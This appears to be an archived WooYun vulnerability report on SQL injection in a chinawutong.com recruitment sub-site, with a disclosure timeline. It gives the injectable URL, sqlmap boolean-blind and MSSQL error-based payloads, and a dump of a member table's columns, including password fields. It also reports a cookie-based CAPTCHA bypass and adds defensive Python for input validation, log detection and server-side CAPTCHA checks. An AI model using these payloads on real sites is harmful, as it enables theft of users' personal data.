WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-12-15: Details have been sent to the vendor and are awaiting the vendor's handling
2015-12-15: Vendor has confirmed; details are disclosed to the vendor only
2015-12-25: Details disclosed to core white hats and experts in the relevant field
2016-01-04: Vendor has fixed the vulnerability and disclosed it proactively; details are now public
SQL injection in a China Wutong (chinawutong.com) sub-site; it can be used to obtain the personal information of a large number of users.
Injection point: http://hr.chinawutong.com/qiuzhi/p1/?p=0%27&pv=
hr.chinawutong.com/qiuzhi/p1/?p=0 and email=1&pv=
Using sqlmap I retrieved the current user, database name, table names and so on. The data could be dumped directly, but because it was slow I did not test any further:
Place: GET
Parameter: p
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: p=0 AND 1958=1958&pv=

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: p=0 AND 746=CONVERT(INT,(CHAR(58)+CHAR(120)+CHAR(115)+CHAR(99)+CHAR(58)+(SELECT (CASE WHEN (746=746) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(112)+CHAR(99)+CHAR(99)+CHAR(58)))&pv=
---
[15:39:03] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: wutong
Table: dbo.huiyuan
[50 columns]
+-----------------+----------+
| Column          | Type     |
+-----------------+----------+
| beiannum        | bit      |
| ChengxinState   | bit      |
| cishu           | bit      |
| CloseVipmidTime | bit      |
| CloseVipTime    | bit      |
| co              | bit      |
| CurrentPosition | bit      |
| cust_kind       | bit      |
| cust_name       | bit      |
| cust_pass       | bit      |
| domain          | bit      |
| email           | bit      |
| GpsLoginNum     | bit      |
| id              | bit      |
| ipviptime       | bit      |
| Ispromoter      | bit      |
| Issample        | bit      |
| logintime       | bit      |
| num             | bit      |
| OpenID          | bit      |
| OpenVipmidTime  | bit      |
| OpenVipTime     | bit      |
| pass_answer     | bit      |
| pass_note       | bit      |
| price           | bit      |
| Recommend       | bit      |
| Recommend1      | bit      |
| score           | bit      |
| scoreGive       | bit      |
| SoftNum         | bit      |
| stylename       | bit      |
| time            | bit      |
| truename        | bit      |
| url             | bit      |
| Verify          | bit      |
| vip             | bit      |
| vipmid          | bit      |
| VLevel          | bit      |
| vnum            | bit      |
| vtype           | bit      |
| vyear           | bit      |
| wanshanRen      | bit      |
| WapNum          | bit      |
| WebSite         | bit      |
| WebSite1        | bit      |
| WXTNumber       | bit      |
| yuangong        | bit      |
| zcrtel          | bit      |
| zhuangtai       | bit      |
| zhuceren        | nvarchar |
+-----------------+----------+
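The `p` parameter is a page number, so the root cause is that a non-integer value reaches the SQL statement at all. The following added example (mine, not code from the report or from the site's application) shows the two defensive pieces a practitioner would want here: strict integer validation of `p` before it touches any query, and a small detector that flags the two sqlmap techniques visible in the output above (a boolean tautology and an MSSQL `CONVERT(INT, ...)` error-based probe) in IIS W3C-style log lines. The log lines and field layout are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log lines (not from the report). Fields, space-separated:
# date time cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2015-12-15 15:39:01 /qiuzhi/p1/ p=1&pv= 200
2015-12-15 15:39:02 /qiuzhi/p1/ p=0%27&pv= 500
2015-12-15 15:39:03 /qiuzhi/p1/ p=0+AND+1958%3D1958&pv= 200
2015-12-15 15:39:03 /qiuzhi/p1/ p=0+AND+746%3DCONVERT(INT,(CHAR(58)%2BCHAR(120)))&pv= 500
2015-12-15 15:39:04 /qiuzhi/p1/ p=2&pv= 200
"""

# Signatures for the two techniques the sqlmap output shows:
# a boolean tautology ("AND 1958=1958") and MSSQL error-based "CONVERT(INT, ...)".
BOOLEAN_BLIND = re.compile(r"\b(and|or)\s+(\d+)\s*=\s*\2\b", re.IGNORECASE)
MSSQL_ERROR_BASED = re.compile(r"\bconvert\s*\(\s*int\s*,", re.IGNORECASE)


def validate_page_param(raw):
    """Strict server-side validation for the integer page number `p`.

    Returns the int for a plain non-negative integer of reasonable length and
    None for anything else, so values such as "0'" or "0 AND 1958=1958" never
    reach the query. The parsed int should then be passed as a bound parameter.
    """
    if raw is None or not re.fullmatch(r"\d{1,6}", raw):
        return None
    return int(raw)


def classify_query(query):
    """Return the technique a decoded query string matches, or None if it looks benign."""
    decoded = unquote_plus(query)
    if MSSQL_ERROR_BASED.search(decoded):
        return "mssql-error-based"
    if BOOLEAN_BLIND.search(decoded):
        return "boolean-based-blind"
    if "'" in decoded:
        return "quote-probe"
    return None


def scan_log(text):
    """Parse the constructed log format and return (time, technique, raw query) per suspicious line."""
    findings = []
    for line in text.splitlines():
        parts = line.split(" ")
        if len(parts) != 5:
            continue  # skip lines that do not match the expected five-field layout
        _date, time, _stem, query, _status = parts
        technique = classify_query(query)
        if technique:
            findings.append((time, technique, query))
    return findings


if __name__ == "__main__":
    for time, technique, query in scan_log(SAMPLE_LOG):
        print(f"{time} {technique}: {query}")
```

Validation rejects the probes before any database call, which is the actual fix; the log scan is the detection side, useful for finding whether the same probes were run against other endpoints. Both regexes are deliberately narrow so they produce few false positives on ordinary page-number traffic.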
A bonus design flaw: the CAPTCHA value is stored in a cookie and is only checked on the front end, so the CAPTCHA can be bypassed directly.
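The flaw is that the client holds the expected answer and the server never checks it independently. The following added example (mine, not code from the report or from the site) contrasts one common shape of that mistake, a server that compares the submitted answer against a client-readable cookie, with the server-side pattern: the answer stays in server storage keyed by an opaque single-use token, and the comparison is constant-time. The in-memory dictionary standing in for the session backend is an assumption of the example.

```python
import hmac
import secrets

# Assumed stand-in for a server-side session backend: token -> expected answer.
_PENDING = {}


def issue_captcha_flawed(answer):
    """Flawed pattern: the expected answer is written into a cookie the client can read and edit."""
    return {"captcha_answer": answer}


def verify_flawed(form_answer, cookies):
    """Flawed check: both values come from the client, so the comparison proves nothing."""
    return cookies.get("captcha_answer") == form_answer


def issue_captcha_secure(answer):
    """Server-side pattern: keep the answer on the server; only an opaque token goes to the client."""
    token = secrets.token_urlsafe(16)
    _PENDING[token] = answer
    return token


def verify_secure(form_answer, token):
    """Consume the token on first use and compare in constant time.

    Unknown or already-used tokens fail, so a replayed or forged token is rejected
    and a wrong answer burns the challenge instead of allowing unlimited guesses.
    """
    expected = _PENDING.pop(token, None)
    if expected is None or form_answer is None:
        return False
    return hmac.compare_digest(expected.encode(), form_answer.encode())


if __name__ == "__main__":
    # Constructed demo values.
    cookies = issue_captcha_flawed("k7p2q")
    cookies["captcha_answer"] = "x"          # client edits the cookie
    print("flawed accepts edited cookie:", verify_flawed("x", cookies))
    token = issue_captcha_secure("k7p2q")
    print("secure rejects wrong answer:", not verify_secure("x", token))
```

The token carries no information about the answer, so a client that "solves" the CAPTCHA without the image has nothing to submit; the single-use pop also means the same token cannot be reused for multiple form submissions.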
Refer to the detailed description.
You have experience in this area.
Severity: High
Vulnerability Rank: 15
Confirmation time: 2015-12-15 17:18
Thanks for the feedback
2016-01-04: Thanks for the feedback; fixed